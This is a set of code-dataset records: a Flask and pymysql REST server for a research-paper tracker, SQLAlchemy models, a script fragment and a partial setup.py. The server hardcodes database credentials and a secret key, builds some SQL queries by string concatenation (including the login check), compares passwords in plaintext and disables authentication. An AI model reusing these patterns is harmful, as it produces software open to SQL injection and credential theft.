discipline_suffix = discipline_suffixes[i]\n print(discipline, discipline_suffix)\n\n year_to_frequencies = {year : {'num_papers' : 0} for year in years} \n compute_overall_frequencies(year_to_frequencies, paper_to_metadata, discipline)\n\n for year in years:\n print(year)\n\n # Load most common memes for that pairing\n common_meme_savepath = os.path.join(CACHE_PATH, f'year_{year}_most_common_{discipline_suffix}.pkl')\n with open(common_meme_savepath, 'rb') as f:\n common_memes = pickle.load(f)[:2500]\n\n meme_to_score_components = {meme : {\n 'frequency' : 0,\n 'in_paper_in_citations' : 0,\n 'in_citations' : 0,\n 'in_paper_not_in_citations' : 0,\n 'not_in_citations' : 0\n } for meme in common_memes}\n compute_n_gram_meme_score_terms(year, meme_to_articles, common_memes, meme_to_score_components,\n paper_to_metadata, discipline)\n save_year_discipline_meme_scores(year_to_frequencies, meme_to_score_components, year, discipline_suffix)\n \n\n","repo_name":"annshin/2023sp_cs6850_network","sub_path":"research_trends/compute_meme_scores.py","file_name":"compute_meme_scores.py","file_ext":"py","file_size_in_byte":7270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42555313933","text":"from sqlalchemy import Boolean, Column, ForeignKey, Integer, String\nfrom sqlalchemy.orm import relationship\n\nfrom database import Base\n\n\nclass ProspectStatement(Base):\n __tablename__ = \"prospect_statement\"\n\n statement_id = Column(Integer, primary_key=True, index=True)\n org_id = Column(Integer)\n prospect_statement = Column(String)\n statement_type = Column(String)\n\nclass ProspectResponse(Base):\n __tablename__ = \"prospect_response\"\n\n response_id = Column(Integer, primary_key=True, index=True)\n statement_id = Column(Integer,ForeignKey(\"prospect_statement.statement_id\"))\n response = Column(String)\n\nclass RepsQuestion(Base):\n __tablename__ = 'reps_question'\n\n org_id = Column(Integer)\n question_id = Column(Integer, primary_key=True, index=True)\n call_type = Column(String)\n question = Column(String)\n","repo_name":"ASWANTH-J/gembrill-fastapi-backend","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18538770660","text":"#!flask/bin/python\n\n\"\"\"Alternative version of the ToDo RESTful server implemented using the\nFlask-RESTful extension.\"\"\"\n\nfrom flask import Flask, jsonify, abort, make_response, g\nfrom flask_restful import Api, Resource, reqparse, fields, marshal\nfrom flask_httpauth import HTTPBasicAuth\nfrom flask_cors import CORS, cross_origin\n\nimport pymysql\n#from pymysqlpool.pool import Pool\n\nfrom datetime import datetime\n\nfrom itsdangerous import (TimedJSONWebSignatureSerializer\n as Serializer, BadSignature, SignatureExpired)\n\napp = Flask(__name__, static_url_path=\"\")\napp.config['SECRET_KEY'] = 'Snu2019!'\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\napi = Api(app)\nauth = HTTPBasicAuth()\n\nhost = \"147.47.206.14\"\nport = 3306\nuser = \"user1\"\npassword = \"Snu2019!\"\ndb = \"research_db\"\nconfig={'host':host, 'port':port, 'user':user, 'password':password, 'database':db, 'autocommit':True}\n#pool = Pool(host=host, port=port, user=user, password=password, db=db, autocommit=True)\n#pool.init()\n\nclass Database:\n def __init__(self):\n self.con = pymysql.connect(host=host, port=port, user=user, password=password, db=db)\n #self.con 
= pool.get_conn()\n self.cur = self.con.cursor(pymysql.cursors.DictCursor)\n\n def close(self):\n self.cur.close()\n self.con.close()\n #pool.release(self.con) \n\n def list_researchers(self):\n self.cur.execute(\"SELECT id, username, fullname, affiliation FROM researcher\")\n result = self.cur.fetchall()\n self.close()\n return result\n\n def get_researcher(self, id):\n self.cur.execute(\"SELECT id, username, fullname, affiliation FROM researcher WHERE id = %s\", id)\n results = self.cur.fetchall()\n self.close()\n if results and len(results) > 0:\n return results[0]\n return None\n\n def list_confs(self):\n self.cur.execute(\"SELECT id, abbr, name, year, location, type, field, impact_factor, link, start_date, end_date, submit_date, notification_date FROM conference WHERE start_date IS NOT NULL ORDER BY start_date ASC\")\n results = self.cur.fetchall()\n self.close()\n return results\n\n def search_confs(self, search_key):\n search_key = search_key.lower()\n self.cur.execute(\"SELECT id, abbr, name, year, location, type, field, impact_factor, link FROM conference WHERE lower(abbr) LIKE %s OR lower(name) LIKE %s ORDER BY abbr\", (search_key, search_key))\n results = self.cur.fetchall()\n self.close()\n return results\n\n def list_papers(self, offsetStart, pageSize):\n self.cur.execute(\"SELECT a.id, title, authors, conference, year, a.affiliation, abstract, comments, read_by, read_date, research_id, c.name AS research_name, a.paper_keys, a.paper_link, b.fullname FROM paper a JOIN researcher b ON a.read_by = b.id LEFT JOIN research c ON a.research_id = c.id ORDER BY read_date DESC LIMIT %s, %s\", (offsetStart, pageSize))\n result = self.cur.fetchall()\n self.close()\n return result\n\n def list_papers_by_researcher(self, rid, offsetStart, pageSize):\n self.cur.execute(\"SELECT a.id, title, authors, conference, year, a.affiliation, abstract, comments, read_by, read_date, research_id, c.name AS research_name, a.paper_keys, a.paper_link, b.fullname FROM paper a JOIN researcher b ON a.read_by = b.id LEFT JOIN research c ON a.research_id = c.id WHERE read_by='\" + rid + \"' ORDER BY read_date DESC LIMIT %s, %s\", (offsetStart, pageSize))\n result = self.cur.fetchall()\n self.close()\n return result\n\n def list_papers_by_project(self, project_id, offsetStart, pageSize):\n self.cur.execute(\"SELECT a.id, title, authors, conference, year, a.affiliation, abstract, comments, read_by, read_date, research_id, c.name AS research_name, a.paper_keys, a.paper_link, b.fullname FROM paper a JOIN researcher b ON a.read_by = b.id JOIN research c ON a.research_id = c.id WHERE a.research_id=%s ORDER BY read_date DESC LIMIT %s, %s\", (str(project_id), offsetStart, pageSize))\n result = self.cur.fetchall()\n self.close()\n return result\n\n def get_paper(self, id):\n self.cur.execute(\"SELECT a.id, title, authors, conference, year, a.affiliation, abstract, comments, read_by, read_date, research_id, c.name AS research_name, a.paper_keys, a.paper_link, b.fullname FROM paper a JOIN researcher b ON a.read_by = b.id LEFT JOIN research c ON a.research_id = c.id WHERE a.id='\" + id + \"'\")\n result = self.cur.fetchall()\n self.close()\n return result\n\n def search_papers(self, search_key):\n search_key = search_key.lower()\n self.cur.execute(\"SELECT a.id, title, authors, conference, year, a.affiliation, abstract, comments, read_by, read_date, research_id, c.name AS research_name, a.paper_keys, a.paper_link, b.fullname FROM paper a JOIN researcher b ON a.read_by = b.id LEFT JOIN research c ON a.research_id = c.id 
WHERE lower(title) LIKE %s OR lower(authors) LIKE %s OR lower(conference) LIKE %s OR lower(b.fullname) LIKE %s ORDER BY read_date DESC\", (search_key, search_key, search_key, search_key))\n result = self.cur.fetchall()\n self.close()\n return result\n\n def get_comments(self, paper_id):\n self.cur.execute(\"SELECT a.id, a.paper_id, a.researcher_id, a.comment, a.contribution_date, b.fullname FROM paper_contribution a JOIN researcher b ON a.researcher_id = b.id WHERE a.paper_id = %s ORDER BY a.contribution_date DESC\", (paper_id))\n result = self.cur.fetchall()\n self.close()\n return result\n\n def insert_comment(self, paper_id, researcher_id, comment, contribution_date):\n self.cur.execute(\"INSERT INTO paper_contribution(paper_id, researcher_id, comment, contribution_date) VALUES(%s, %s, %s, %s)\", (paper_id, researcher_id, comment, contribution_date))\n self.con.commit()\n # get new created id\n self.cur.execute(\"SELECT MAX(id) AS id FROM paper_contribution\")\n result = self.cur.fetchall()\n self.close()\n return result[0]['id']\n\n def update_comment(self, comment_id, paper_id, researcher_id, comment, updated_date):\n self.cur.execute(\"UPDATE paper_contribution SET comment = %s, updated_date = %s WHERE id = %s AND paper_id = %s AND researcher_id = %s\", (comment, updated_date, comment_id, paper_id, researcher_id))\n self.con.commit()\n self.close()\n return comment_id\n\n def delete_comment(self, id, paper_id, researcher_id):\n num_row = self.cur.execute(\"DELETE FROM paper_contribution WHERE id = %s AND paper_id = %s AND researcher_id = %s\", (id, paper_id, researcher_id))\n self.con.commit()\n self.close()\n return num_row\n\n def check_login(self, username, password):\n print(username)\n if not username or not password:\n return None\n # select password from DB\n self.cur.execute(\"SELECT id, username, fullname, password FROM researcher WHERE username = '\" + username + \"'\")\n result = self.cur.fetchall()\n self.close()\n if result and len(result) > 0 and password == result[0][\"password\"]:\n return result[0]\n return None\n\n def getUser(self, id):\n self.cur.execute(\"SELECT id, username, fullname FROM researcher WHERE id = %s\", (id))\n results = self.cur.fetchall()\n self.close()\n if (results and len(results) > 0):\n return results[0]\n return None\n\n def insert_paper(self, title, authors, conference, year, affiliation, abstract, comments, read_by, read_date, research_id, keys, paper_link):\n self.cur.execute(\"INSERT INTO paper(title, authors, conference, year, affiliation, abstract, comments, read_by, read_date, research_id, paper_keys, paper_link) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\", (title, authors, conference, year, affiliation, abstract, comments, read_by, read_date, research_id, keys, paper_link))\n self.con.commit()\n # get new id\n self.cur.execute(\"SELECT MAX(id) AS id FROM paper\")\n result = self.cur.fetchall()\n self.close()\n if result and len(result) > 0:\n return result[0]['id']\n return 0\n\n def update_paper(self, id, user_id, title, authors, conference, year, affiliation, abstract, comments, read_by, read_date, research_id, keys, paper_link):\n num_row = self.cur.execute(\"UPDATE paper SET title=%s, authors=%s, conference=%s, year=%s, affiliation=%s, abstract=%s, comments=%s, read_by=%s, read_date=%s, research_id=%s, paper_keys=%s, paper_link=%s WHERE id=%s AND read_by=%s\", (title, authors, conference, year, affiliation, abstract, comments, read_by, read_date, research_id, keys, paper_link, id, user_id))\n self.con.commit()\n 
self.close()\n return num_row\n\n def delete_paper(self, id, user_id):\n num_row = self.cur.execute(\"DELETE FROM paper WHERE id = %s AND read_by = %s\", (id, user_id))\n self.con.commit()\n self.close()\n return num_row\n\n def get_research(self, id):\n self.cur.execute(\"SELECT id, name, goals, start_date, end_date_plan, end_date_actual, type FROM research WHERE id = %s\", (id))\n results = self.cur.fetchall()\n self.close()\n return results\n\n def list_research(self):\n self.cur.execute(\"SELECT id, name, goals, start_date, end_date_plan, end_date_actual, type, created_by FROM research ORDER BY type, start_date DESC\")\n results = self.cur.fetchall()\n self.close()\n return results\n\n def insert_research(self, name, goals, start_date, end_date_plan, created_by, type):\n self.cur.execute(\"INSERT INTO research(name, goals, start_date, end_date_plan, created_by, type) VALUES (%s, %s, %s, %s, %s, %s)\", (name, goals, start_date, end_date_plan, created_by, type))\n self.con.commit()\n # get new id\n self.cur.execute(\"SELECT MAX(id) AS id FROM research\")\n result = self.cur.fetchall()\n self.close()\n return result[0]['id']\n\n def update_research(self, id, name, goals, start_date, end_date_plan, created_by, type):\n self.cur.execute(\"UPDATE research SET name = %s, goals = %s, start_date = %s, end_date_plan = %s, created_by = %s, type = %s WHERE id = %s\", (name, goals, start_date, end_date_plan, created_by, type, id))\n self.con.commit()\n self.close()\n return id\n\n def delete_research(self, id, created_by):\n # check if research not use in other paper\n self.cur.execute(\"SELECT COUNT(1) AS count FROM paper WHERE research_id = %s\", (str(id)))\n result = self.cur.fetchall()\n if (result and result[0]['count'] > 0):\n return 0\n # delete\n num_row = self.cur.execute(\"DELETE FROM research WHERE id = %s AND created_by = %s\", (str(id), str(created_by)))\n self.con.commit()\n self.close()\n return num_row\n\n def get_experiments(self, research_id, researcher_id):\n self.cur.execute(\"SELECT a.id, a.research_id, a.researcher_id, a.start_date, a.end_date, a.goal, a.input, a.method, a.result FROM experiment a WHERE a.research_id = %s AND a.researcher_id = %s ORDER BY a.start_date DESC\", (research_id, researcher_id))\n result = self.cur.fetchall()\n self.close()\n return result\n\n def insert_experiment(self, research_id, researcher_id, start_date, end_date, goal, input, method, result):\n self.cur.execute(\"INSERT INTO experiment(research_id, researcher_id, start_date, end_date, goal, input, method, result) VALUES(%s, %s, %s, %s, %s, %s, %s, %s)\", (research_id, researcher_id, start_date, end_date, goal, input, method, result))\n self.con.commit()\n # get new created id\n self.cur.execute(\"SELECT MAX(id) AS id FROM experiment\")\n result = self.cur.fetchall()\n self.close()\n return result[0]['id']\n\n def update_experiment(self, id, research_id, researcher_id, start_date, end_date, goal, input, method, result):\n self.cur.execute(\"UPDATE experiment SET research_id = %s, researcher_id = %s, start_date = %s, end_date = %s, goal = %s, input = %s, method = %s, result = %s WHERE id = %s\", (research_id, researcher_id, start_date, end_date, goal, input, method, result, id))\n self.con.commit()\n self.close()\n return id\n\n def delete_experiment(self, id, research_id, researcher_id):\n num_row = self.cur.execute(\"DELETE FROM experiment WHERE id = %s AND research_id = %s AND researcher_id = %s\", (id, research_id, researcher_id))\n self.con.commit()\n self.close()\n return 
num_row\n\n\nclass User():\n def __init__(self, id, username, fullname):\n self.id = id\n self.username = username\n self.fullname = fullname\n\n def generate_auth_token(self, expiration = 600):\n print('generate_auth_token enter')\n s = Serializer(app.config['SECRET_KEY'], expires_in = expiration)\n return s.dumps({ 'id': self.id })\n\n @staticmethod\n def verify_auth_token(token):\n print('verify auth token enter')\n s = Serializer(app.config['SECRET_KEY'])\n try:\n data = s.loads(token)\n except SignatureExpired:\n return None # valid token, but expired\n except BadSignature:\n return None # invalid token\n db = Database()\n user = db.getUser(data['id'])\n if user:\n return User(user['id'], user['username'], user['fullname'])\n return None\n\n@auth.verify_password\ndef verify_password(username, password):\n print('verify password enter')\n print('username: ' + username)\n # first try to authenticate by token\n user = User.verify_auth_token(username)\n if not user:\n # try to authenticate with username/password\n db = Database()\n result = db.check_login(username, password)\n if not result:\n return False\n user = User(result['id'], result['username'], result['fullname'])\n \n g.user = user\n return True\n\n@auth.error_handler\ndef unauthorized():\n # return 403 instead of 401 to prevent browsers from displaying the default\n # auth dialog\n return make_response(jsonify({'message': 'Unauthorized access'}), 403)\n\n@app.route('/api/v1/token', methods=['POST','OPTIONS'])\n@cross_origin()\n@auth.login_required\ndef get_auth_token():\n print('get_auth_token enter')\n token = g.user.generate_auth_token(600)\n return jsonify({'token': token.decode('ascii'), 'duration': 600, 'id': g.user.id, 'username': g.user.username, 'fullname': g.user.fullname})\n\n\nclass PaperListAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('offsetStart', type=int, location='json')\n self.reqparse.add_argument('pageSize', type=int, location='json')\n super(PaperListAPI, self).__init__()\n\n def get(self, rid=0):\n args = self.reqparse.parse_args()\n # missing paging arguments are returned as None, so fall back to defaults\n offsetStart = args['offsetStart'] or 0\n pageSize = args['pageSize'] or 99999\n\n db = Database()\n if not rid or rid == 0:\n papers = db.list_papers(offsetStart, pageSize)\n else:\n papers = db.list_papers_by_researcher(str(rid), offsetStart, pageSize)\n for paper in papers:\n read_date = paper['read_date']\n paper['read_date'] = read_date.strftime('%Y/%m/%d %H:%M:%S')\n return {'papers': papers}\n\n\nclass PaperAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('title', type=str, location='json')\n self.reqparse.add_argument('authors', type=str, location='json')\n self.reqparse.add_argument('conference', type=str, location='json')\n self.reqparse.add_argument('year', type=str, location='json')\n self.reqparse.add_argument('affiliation', type=str, location='json')\n self.reqparse.add_argument('comments', type=str, location='json')\n self.reqparse.add_argument('abstract', type=str, location='json')\n self.reqparse.add_argument('read_by', type=int, location='json')\n self.reqparse.add_argument('read_date', type=str, location='json')\n self.reqparse.add_argument('research_id', type=int, location='json')\n
self.reqparse.add_argument('keys', type=str, location='json')\n self.reqparse.add_argument('paper_link', type=str, location='json')\n super(PaperAPI, self).__init__()\n\n def get(self, id):\n db = Database()\n paper = db.get_paper(str(id))\n if paper and len(paper) > 0:\n paper = paper[0]\n read_date = paper['read_date']\n paper['read_date'] = read_date.strftime('%Y/%m/%d %H:%M:%S')\n return {'paper': paper}\n\n def post(self, id=0):\n try: \n args = self.reqparse.parse_args()\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n if not inputs['read_date']:\n now = datetime.now()\n inputs['read_date'] = now.strftime('%Y/%m/%d %H:%M:%S')\n db = Database()\n if id == 0:\n new_id = db.insert_paper(inputs['title'], inputs['authors'], inputs['conference'], inputs['year'], inputs['affiliation'], inputs['abstract'], inputs['comments'], inputs['read_by'], inputs['read_date'], inputs['research_id'], inputs['keys'], inputs['paper_link'])\n else:\n db.update_paper(str(id), inputs['read_by'], inputs['title'], inputs['authors'], inputs['conference'], inputs['year'], inputs['affiliation'], inputs['abstract'], inputs['comments'], inputs['read_by'], inputs['read_date'], inputs['research_id'], inputs['keys'], inputs['paper_link'])\n new_id = id\n return {'id': new_id}\n except Exception as e:\n return {'error': str(e)}\n\n def delete(self, id):\n try:\n args = self.reqparse.parse_args()\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n db = Database()\n num_row = db.delete_paper(str(id), inputs['read_by'])\n return {'num_row': num_row}\n except Exception as e:\n return {'error': str(e)}\n\nclass PaperContributeAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('comment_id', type=int, location='json')\n self.reqparse.add_argument('user_id', type=int, location='json')\n self.reqparse.add_argument('paper_id', type=int, location='json')\n self.reqparse.add_argument('comment', type=str, location='json')\n super(PaperContributeAPI, self).__init__()\n\n def get(self, paper_id):\n db = Database()\n comments = db.get_comments(str(paper_id))\n for comment in comments:\n comment_date = comment['contribution_date']\n comment['contribution_date'] = comment_date.strftime('%Y/%m/%d %H:%M:%S')\n return {'comments': comments}\n\n def post(self, paper_id=0):\n try:\n args = self.reqparse.parse_args()\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n now = datetime.now()\n inputs['contribution_date'] = now.strftime('%Y/%m/%d %H:%M:%S')\n db = Database()\n if not inputs['comment_id']:\n new_id = db.insert_comment(inputs['paper_id'], inputs['user_id'], inputs['comment'], inputs['contribution_date'])\n else:\n new_id = db.update_comment(inputs['comment_id'], inputs['paper_id'], inputs['user_id'], inputs['comment'], inputs['contribution_date'])\n return {'id': new_id}\n\n except Exception as e:\n return {'error': str(e)}\n\n def delete(self, paper_id=0):\n try:\n args = self.reqparse.parse_args()\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n db = Database()\n num_row = db.delete_comment(str(inputs['comment_id']), str(inputs['paper_id']), str(inputs['user_id']))\n return {'num_row': num_row}\n except Exception as e:\n return {'error': str(e)}\n\n\nclass ResearcherListAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n super(ResearcherListAPI, self).__init__()\n\n def get(self):\n db = Database()\n researchers = db.list_researchers()\n return {'researchers': 
researchers}\n\nclass ResearcherAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n super(ResearcherAPI, self).__init__()\n\n def get(self, id):\n db = Database()\n researcher = db.get_researcher(str(id))\n return {'researcher': researcher}\n\nclass ResearchAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('name', type=str, location='json')\n self.reqparse.add_argument('goals', type=str, location='json')\n self.reqparse.add_argument('start_date', type=str, location='json')\n self.reqparse.add_argument('end_date_plan', type=str, location='json')\n self.reqparse.add_argument('created_by', type=int, location='json')\n self.reqparse.add_argument('type', type=int, location='json')\n self.reqparse.add_argument('offsetStart', type=int, location='json')\n self.reqparse.add_argument('pageSize', type=int, location='json')\n super(ResearchAPI, self).__init__()\n\n def get(self, id=0):\n args = self.reqparse.parse_args()\n # missing paging arguments are returned as None, so fall back to defaults\n offsetStart = args['offsetStart'] or 0\n pageSize = args['pageSize'] or 99999\n\n db = Database()\n if id > 0:\n research_list = db.get_research(str(id))\n db = Database()\n papers = db.list_papers_by_project(str(id), offsetStart, pageSize)\n else:\n research_list = db.list_research()\n papers = []\n for r in research_list:\n r['start_date'] = r['start_date'].strftime('%Y/%m/%d %H:%M:%S')\n if (r['end_date_plan']):\n r['end_date_plan'] = r['end_date_plan'].strftime('%Y/%m/%d %H:%M:%S')\n if (r['end_date_actual']):\n r['end_date_actual'] = r['end_date_actual'].strftime('%Y/%m/%d %H:%M:%S')\n for p in papers:\n p['read_date'] = p['read_date'].strftime('%Y/%m/%d %H:%M:%S')\n return [{'researches': research_list}, {'papers': papers}]\n\n def post(self, id=0):\n args = self.reqparse.parse_args()\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n if not inputs['start_date']:\n now = datetime.now()\n inputs['start_date'] = now.strftime('%Y/%m/%d %H:%M:%S')\n if not inputs['end_date_plan']:\n inputs['end_date_plan'] = None\n db = Database()\n if id == 0:\n new_id = db.insert_research(inputs['name'], inputs['goals'], inputs['start_date'], inputs['end_date_plan'], inputs['created_by'], inputs['type'])\n else:\n new_id = db.update_research(str(id), inputs['name'], inputs['goals'], inputs['start_date'], inputs['end_date_plan'], inputs['created_by'], inputs['type'])\n return {'id': new_id}\n\n def delete(self, id):\n try:\n args = self.reqparse.parse_args()\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n db = Database()\n num_row = db.delete_research(str(id), inputs['created_by'])\n return {'num_row': num_row}\n except Exception as e:\n return {'error': str(e)}\n\nclass ExperimentAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('experiment_id', type=int, location='json')\n self.reqparse.add_argument('researcher_id', type=int, location='json')\n self.reqparse.add_argument('research_id', type=int, location='json')\n self.reqparse.add_argument('start_date', type=str, location='json')\n self.reqparse.add_argument('end_date', type=str, location='json')\n self.reqparse.add_argument('goal', type=str, location='json')\n self.reqparse.add_argument('input', type=str, location='json')\n self.reqparse.add_argument('method', type=str, location='json')\n self.reqparse.add_argument('result',
type=str, location='json')\n super(ExperimentAPI, self).__init__()\n\n def get(self, research_id):\n args = self.reqparse.parse_args()\n db = Database()\n # get_experiments() requires both ids; researcher_id comes from the parsed request body\n results = db.get_experiments(str(research_id), str(args['researcher_id']))\n for result in results:\n start_date = result['start_date']\n if start_date:\n result['start_date'] = start_date.strftime('%Y/%m/%d %H:%M:%S')\n end_date = result['end_date']\n if end_date:\n result['end_date'] = end_date.strftime('%Y/%m/%d %H:%M:%S')\n return {'experiments': results}\n\n def post(self, research_id=0):\n try:\n args = self.reqparse.parse_args()\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n if not inputs['start_date']:\n now = datetime.now()\n inputs['start_date'] = now.strftime('%Y/%m/%d %H:%M:%S')\n db = Database()\n if not inputs['experiment_id']:\n new_id = db.insert_experiment(inputs['research_id'], inputs['researcher_id'], inputs['start_date'], inputs['end_date'], inputs['goal'], inputs['input'], inputs['method'], inputs['result'])\n else:\n new_id = db.update_experiment(inputs['experiment_id'], inputs['research_id'], inputs['researcher_id'], inputs['start_date'], inputs['end_date'], inputs['goal'], inputs['input'], inputs['method'], inputs['result'])\n return {'id': new_id}\n\n except Exception as e:\n return {'error': str(e)}\n\n def delete(self, research_id=0):\n try:\n args = self.reqparse.parse_args()\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n db = Database()\n num_row = db.delete_experiment(str(inputs['experiment_id']), str(inputs['research_id']), str(inputs['researcher_id']))\n return {'num_row': num_row}\n except Exception as e:\n return {'error': str(e)}\n\nclass ConferenceAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n super(ConferenceAPI, self).__init__()\n\n def get(self):\n db = Database()\n confs = db.list_confs()\n for conf in confs:\n if conf['start_date']:\n conf['start_date'] = conf['start_date'].strftime('%Y/%m/%d %H:%M:%S')\n if conf['end_date']:\n conf['end_date'] = conf['end_date'].strftime('%Y/%m/%d %H:%M:%S')\n if conf['submit_date']:\n conf['submit_date'] = conf['submit_date'].strftime('%Y/%m/%d %H:%M:%S')\n if conf['notification_date']:\n conf['notification_date'] = conf['notification_date'].strftime('%Y/%m/%d %H:%M:%S')\n if conf['type'] == 1:\n conf['type'] = 'conference'\n else:\n conf['type'] = 'journal'\n return {'confs': confs}\n\nclass ConferenceSearchAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n super(ConferenceSearchAPI, self).__init__()\n\n def get(self, search_key):\n db = Database()\n confs = db.search_confs(\"%\" + search_key + \"%\")\n for conf in confs:\n if conf['type'] == 1:\n conf['type'] = 'conference'\n else:\n conf['type'] = 'journal'\n return {'confs': confs}\n\nclass PaperSearchAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n super(PaperSearchAPI, self).__init__()\n\n def get(self, search_key):\n db = Database()\n papers = db.search_papers(\"%\" + search_key + \"%\")\n for paper in papers:\n if paper['read_date']:\n paper['read_date'] = paper['read_date'].strftime('%Y/%m/%d %H:%M:%S')\n return {'papers': papers}\n\napi.add_resource(ResearcherAPI, '/api/v1/researcher/<int:id>', endpoint='researcher')\napi.add_resource(ResearcherListAPI, '/api/v1/researchers', endpoint='researchers')\napi.add_resource(PaperListAPI, '/api/v1/papers')\napi.add_resource(PaperListAPI, '/api/v1/papers/<int:rid>', endpoint='papers')\napi.add_resource(PaperAPI, '/api/v1/paper/', '/api/v1/paper/<int:id>', endpoint='paper')\napi.add_resource(PaperContributeAPI, '/api/v1/comment/',
'/api/v1/comment/<int:paper_id>', endpoint='comment')\napi.add_resource(ResearchAPI, '/api/v1/research/', '/api/v1/research/<int:id>', endpoint='research')\napi.add_resource(ExperimentAPI, '/api/v1/experiment/', '/api/v1/experiment/<int:research_id>', endpoint='experiment')\napi.add_resource(ConferenceAPI, '/api/v1/conf', endpoint='conf')\napi.add_resource(ConferenceSearchAPI, '/api/v1/conf/search/<search_key>')\napi.add_resource(PaperSearchAPI, '/api/v1/paper/search/<search_key>')\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=38500)\n","repo_name":"alexbui91/happy_research","sub_path":"backend/rest-server-v2.py","file_name":"rest-server-v2.py","file_ext":"py","file_size_in_byte":29492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"37169740253","text":"\"\"\"A setuptools based setup module.\n\nSee:\n https://packaging.python.org/guides/distributing-packages-using-setuptools/\n https://github.com/pypa/sampleproject\n\"\"\"\n\n\"\"\"\nPACKAGE PUBLISHING STEPS:\n\n 1. Update the ./HISTORY.md file with the latest release notes.\n 2. Increment the version number.\n -- Increment the version number in ./docs/version.md manually.\n -- Increment the version number in ./setup.py (below) manually.\n ** These values must match!!!\n 3. Build the package:\n > python setup.py sdist\n ** Making the wheel and bdists causes issues with pip install right now.\n 4. Check the package:\n > twine check dist/*\n 5. Test PyPI upload:\n > twine upload --repository-url https://test.pypi.org/legacy/ dist/*\n 6. Upload to PyPI:\n > twine upload --repository-url https://upload.pypi.org/legacy/ dist/*\n\n Notes:\n - Uploads require a PyPI user account.\n - Use the twine keyring feature for cli credential management locally: https://pypi.org/project/twine/\n - Use the pypi-cli package to inspect package info and status: https://pypi.org/project/pypi-cli/\n ex. > pypi info genomedashboard\n\nTEST PYPI PACKAGE:\n\n 1. Install from test-pypi to validate package locally.\n > pip install -i https://test.pypi.org/simple/ genomedashboard\n > pip install -i https://test.pypi.org/simple/ genomedashboard==$VERSION\n 2. Install from PyPI and test once package passes validation.\n > pip install genomedashboard\n\"\"\"\n\n\n# Favor setuptools over distutils.\n# io.open is needed for projects that support Python 2.7\n# It ensures open() defaults to text mode with universal newlines,\n# and accepts an argument to specify the text encoding\n# Python 3 only projects can skip this import\n\nfrom setuptools import setup, find_packages\nfrom os import path\nfrom io import open\n\nhere = path.abspath(path.dirname(__file__))\n\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n readme = f.read()\n\nsetup(\n name='genomedashboard',\n version='0.0.90',\n description='Genome Dashboard is the logic behind a web-based prototype of a genomics dashboard, specifically designed to integrate informatics and 4D material studies of chromatin. 
Genome Dashboard unites our Interactive Chromatin Modeling (ICM) tools with the Biodalliance genome browser and the JSMol molecular viewer to rapidly fold any DNA sequence into atomic or coarse-grained models of DNA, nucleosomes or chromatin.',\n package_dir={'': 'src'},\n packages=find_packages(where='src'),\n scripts=['src/genomedashboard.py'],\n python_requires='>=2.7, ==3.*, <4',\n author='Genome Dashboard Team',\n author_email='genome.dashboard@gmail.com',\n long_description=readme,\n long_description_content_type='text/markdown',\n license='Louisiana Tech University License',\n url='http://dna.engr.latech.edu/~gdash/GDash-landing-page/',\n download_url='https://pypi.org/project/genomedashboard/#files',\n project_urls={\n 'PyPI': 'https://pypi.org/project/genomedashboard/',\n 'Documentation': 'https://genomedashboard.readthedocs.io/en/latest/readme.html',\n 'Source Code': 'https://github.com/genomeDashboard/genomedashboard',\n 'Issue Tracker': 'https://github.com/genome-dashboard/genome-dashboard-python/issues',\n 'Demo': 'http://dna.engr.latech.edu/~gdash/',\n # 'Funding': 'https://donate.pypi.org',\n # 'Say Thanks!': 'http://saythanks.io/to/example',\n },\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Science/Research',\n 'Intended Audience :: Healthcare Industry',\n 'Intended Audience :: Education',\n 'Topic :: Software Development :: Libraries',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n \"Programming Language :: Python :: 2\",\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n keywords='python biology genomics genome dashboard',\n install_requires=[\n 'setuptools',\n 'docutils>=0.3',\n # 'click>=6.0',\n 'twobitreader',\n 'pyBigWig',\n 'numpy',\n 'scipy',\n 'matplotlib',\n ],\n extras_require={\n 'dev': ['check-manifest'],\n 'test': ['coverage'],\n },\n package_data={\n '': ['data/*.dat', 'data/*.txt'],\n },\n entry_points={\n # 'console_scripts': ['genomedashboard=src.genomedashboard:main'],\n },\n 